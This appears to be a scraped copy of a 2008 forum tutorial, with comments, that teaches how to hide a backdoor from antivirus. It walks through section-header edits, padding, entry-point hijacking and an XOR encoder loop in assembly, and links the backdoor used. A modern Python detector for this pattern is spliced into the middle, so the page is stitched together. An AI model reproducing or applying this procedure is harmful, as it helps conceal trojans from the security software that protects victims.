842 evading anti virus detection

Upload: wajahat-qurashi

Post on 06-Apr-2018


  • 8/3/2019 842 Evading Anti Virus Detection

    1/9




    Evading Anti Virus Detection

    Learn how to hide your trojans, backdoors, etc. from anti virus.

    Hiding backdoors and trojans from antivirus software
    ---------------------------------------------------------

    This is a POC on how to evade detection from AV. In this article I will try to guide you through the generic steps needed for this process, and show you by example on a specific back door available. This is a POC and not applicable to modern AV. However, the process for developing your own encoding/decoding scheme, so that this will work, is entirely valid.

    Programs used
    -------------

    http://www.white-scorpion.nl/programs/backdoor.zip -- basic back door
    http://www.4shared.com/file/32660382/3562d77f/LordPE.html -- LordPE
    http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm -- Hex Editor
    http://www.ollydbg.de/ -- ollydbg

    General Overview
    ----------------

    We are going to start by increasing the file size of our backdoor, giving us room of our own to write code in. We will then hijack the entry point of the program and redirect it to our own encoder. This encoder, for the POC, will XOR the file contents and then jump back to the original starting place. XOR is a reversible process, so when the file is saved in this encoded state the signatures will not match those in the AV database. When run, however, the same XOR loop will decode the program while in memory, where the AV does not affect it.

    Let's get started
    ----------------

    Note: Your addresses might not match mine exactly, so look at the general structure and you will be able to follow along.

    Step - 1
    --------

    Open up backdoor.exe (located in the bin folder) in LordPE. LordPE is a portable executable viewer and editor.

    -Click on PE editor to open the file
    -Click Sections in the new window. Here we see 3 sections: .text, .rdata and .data. For this example we will select .data. Right click and select Edit section header.
    -Add 1000 hex bytes to the virtual size and the raw size.
    VirtualSize = 00001B4A
    RawSize = 00001200
    -Click on the (...) next to the flags and set 'Executable as code'. This is where we will build our encoder/decoder and thus need to have it executed.
    -Edit the section header for .text as well to writable (also under flags)
    -Save and close LordPE

    Step - 2
    --------

    If you tried to open your backdoor now you will notice an error indicating it is not a valid Win32 Application. This is because our sizes do not balance. We indicated there were an extra 1000 hex bytes, but have not actually added anything to the program. So we will now pad our program.

    -Open it up in XVI32 (or other hex editor of your choice)
    -Scroll to the end of the file; this is where we will add our 1000 hex bytes.
    -Edit > Insert (Select Hex String: 00, Insert times: choose hexadecimal $1000)

    This inserts our 1000 bytes needed to write our code in. Now save and close the hex editor.

    If you were to run the backdoor.exe now, you will notice it does work, but is still detected by the antivirus. We have not changed our code, or signature, yet.

    Step - 3
    --------

    Ollydbg: I am going to assume you have a basic understanding of what olly is and how to use a few basic features.

    --Preparing for our code injection--

    Open the back door and first look at a few things.
    -Address of the entry point
    -Address of our 1000 hex bytes (you can select an address anywhere in this area)

    Copy the first few lines of the backdoor.exe to the clipboard, and keep them available in notepad for later reference.

    Now scroll down to the padded 00 bytes and choose an address where we will inject our encoder. For this example I am going to choose address 00401590.

    --Altering the code--

    First thing we will need to do now is hijack the ModuleEntryPoint and redirect it to our section.

    JMP 00401590 # This will force the jump from the module entry point to our code cave

    Select this line and save the file. Right click > Copy to executable > Selection. Then save the file as backdoor_v2.exe.

    Note: if you change the file name from the original like I did, go ahead and close the first and open up the altered one.

    You will now notice the first two lines of code have changed.

    00401000 > $ E9 8B050000    JMP backdoor.00401590
    00401005 . 68 34314000      >ASCII "h41@",0

    If you single-step once in this program now you will notice you end on address 00401590. Now we can begin writing our XOR loop.

    MOV EAX, 0040100A          # Start of the encoding range
    XOR BYTE PTR DS:[EAX], 5E  # XOR the byte EAX points to with the key 5E
    INC EAX                    # Increase EAX

    CMP EAX, 004014EB          # Test whether we've reached the end of the encoding range
    JLE SHORT 00401595         # If not, jump back to the XOR command

    After this we need to put the code in that we overwrote at the beginning.

    CALL 00401468
    PUSH 00403134

    Then we will jump to the address after the push command. At address 0040100A

    JMP 0040100A

    At this point we now have the XOR loop written, the following commands, and a return to the beginning. However, we are not quite done yet. Save your modifications, and set a breakpoint (F2) after the JLE SHORT command. Now run the program; it will stop at the breakpoint, and the program will now be encoded. Highlight the entire program and again save this file (backdoor_v3.exe).

    The program is now entirely encoded except for the first few lines and our code cave. When this is now run, it will again jump to our XOR loop, decode itself, and then proceed to function as it was written.
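The two header edits this walkthrough depends on (a data section made executable, a code section made writable, and an entry point that is nothing but a JMP into that data section) are also what a defender can look for statically. The following is an added example, not code from the article or from LordPE/OllyDbg: it parses PE32 section headers with only the standard library, flags any section that is both writable and executable, and flags an entry point whose first instruction is a near JMP (E9) into a different section. `build_sample` constructs a synthetic two-section image for the check to run on; its RVAs, sizes and the cave address 0x2590 are constructed values chosen to mirror the article's layout (entry at 00401000 with image base 00400000), and the image is not a runnable program.

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Parse PE32 headers: returns (entry_rva, sections). Each section is a dict
    holding name, vaddr, vsize, rawptr, rawsize and the characteristics flags."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    nsect = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsect):
        off = opt + opt_size + i * 40                     # IMAGE_SECTION_HEADER
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "rawptr": rawptr,
                         "rawsize": rawsize, "flags": flags})
    return entry_rva, sections


def section_for_rva(sections, rva):
    """Return the section whose mapped range contains rva, or None."""
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def audit_pe(data):
    """Heuristics for the code-cave pattern: a section that is both writable and
    executable, and an entry point that immediately JMPs into another section."""
    entry_rva, sections = parse_pe(data)
    findings = []
    for s in sections:
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE):
            findings.append(f"section {s['name']} is both writable and executable (flags {s['flags']:#010x})")
    entry_sec = section_for_rva(sections, entry_rva)
    if entry_sec is not None:
        off = entry_sec["rawptr"] + (entry_rva - entry_sec["vaddr"])   # file offset of entry point
        if off + 5 <= len(data) and data[off] == 0xE9:                 # E9 rel32 = JMP near
            rel = struct.unpack_from("<i", data, off + 1)[0]
            target = (entry_rva + 5 + rel) & 0xFFFFFFFF
            tgt = section_for_rva(sections, target)
            if tgt is not entry_sec:
                findings.append(f"entry point at RVA {entry_rva:#x} jumps straight into "
                                f"{tgt['name'] if tgt else 'unmapped memory'} (RVA {target:#x})")
    return findings


def build_sample(hijacked):
    """Construct a minimal two-section PE32 image (synthetic test data, not a runnable
    program). With hijacked=True the headers mirror the article's edits: .data gains
    code/execute, .text gains write, and the entry point becomes a JMP into .data."""
    text_flags = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    data_flags = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    if hijacked:
        text_flags |= IMAGE_SCN_MEM_WRITE
        data_flags |= IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)      # i386, 2 sections
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                           # ImageBase

    def hdr(name, vsize, vaddr, rawsize, rawptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + hdr(b".text", 0x200, 0x1000, 0x200, 0x200, text_flags)
               + hdr(b".data", 0x1000, 0x2000, 0x200, 0x400, data_flags)).ljust(0x200, b"\0")
    text = bytearray(0x200)
    if hijacked:
        text[:5] = b"\xE9" + struct.pack("<i", 0x2590 - (0x1000 + 5))  # JMP to the cave at RVA 0x2590
    else:
        text[:5] = b"\xE8\x63\x04\x00\x00"                              # CALL 00401468, the original first instruction
    return headers + bytes(text) + bytes(0x200)


if __name__ == "__main__":
    for label, sample in (("original", build_sample(False)), ("hijacked", build_sample(True))):
        print(label, audit_pe(sample) or ["no findings"])
```

Both checks are triage signals rather than verdicts: legitimately packed software (UPX and similar) also ships writable-and-executable sections and an entry stub that jumps elsewhere, so pair them with a memory scan after the unpacking loop has run, which sees the original bytes again and is the reason the article calls this POC inapplicable to modern AV.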

    This article was written by stdio in reference to a demo performed by Mati Aharoni (Muts).

    Posted by stdio on July 26 2008 - 12:26:10

    Comments

    Uber0n on July 27 2008 - 09:58:10
    Really interesting and very well written. I'm impressed B)

    korg on August 19 2008 - 08:15:29
    Nice job. I have read most of Mati's articles I have found; he has some interesting topics.

    Zephyr_Pure on August 29 2008 - 04:17:11
    It's very rare that I say this... but, that was a damn good article. Showed a great deal of technique and knowledge, while keeping it simple.

    stdio on August 29 2008 - 17:54:11
    Thanks for all the kind replies. However I did manage to stumble across a more detailed paper describing the same process written after mine. Here's the link if interested: http://www.milw0rm.com/papers/217

    sam207 on October 17 2008 - 07:07:53
    very nice one... Thanks a lot for this one..

    hellboundhackersok on November 08 2008 - 21:28:57
    The backdoor program makes McAfee SiteAdvisor turn red. nice job. ahahah
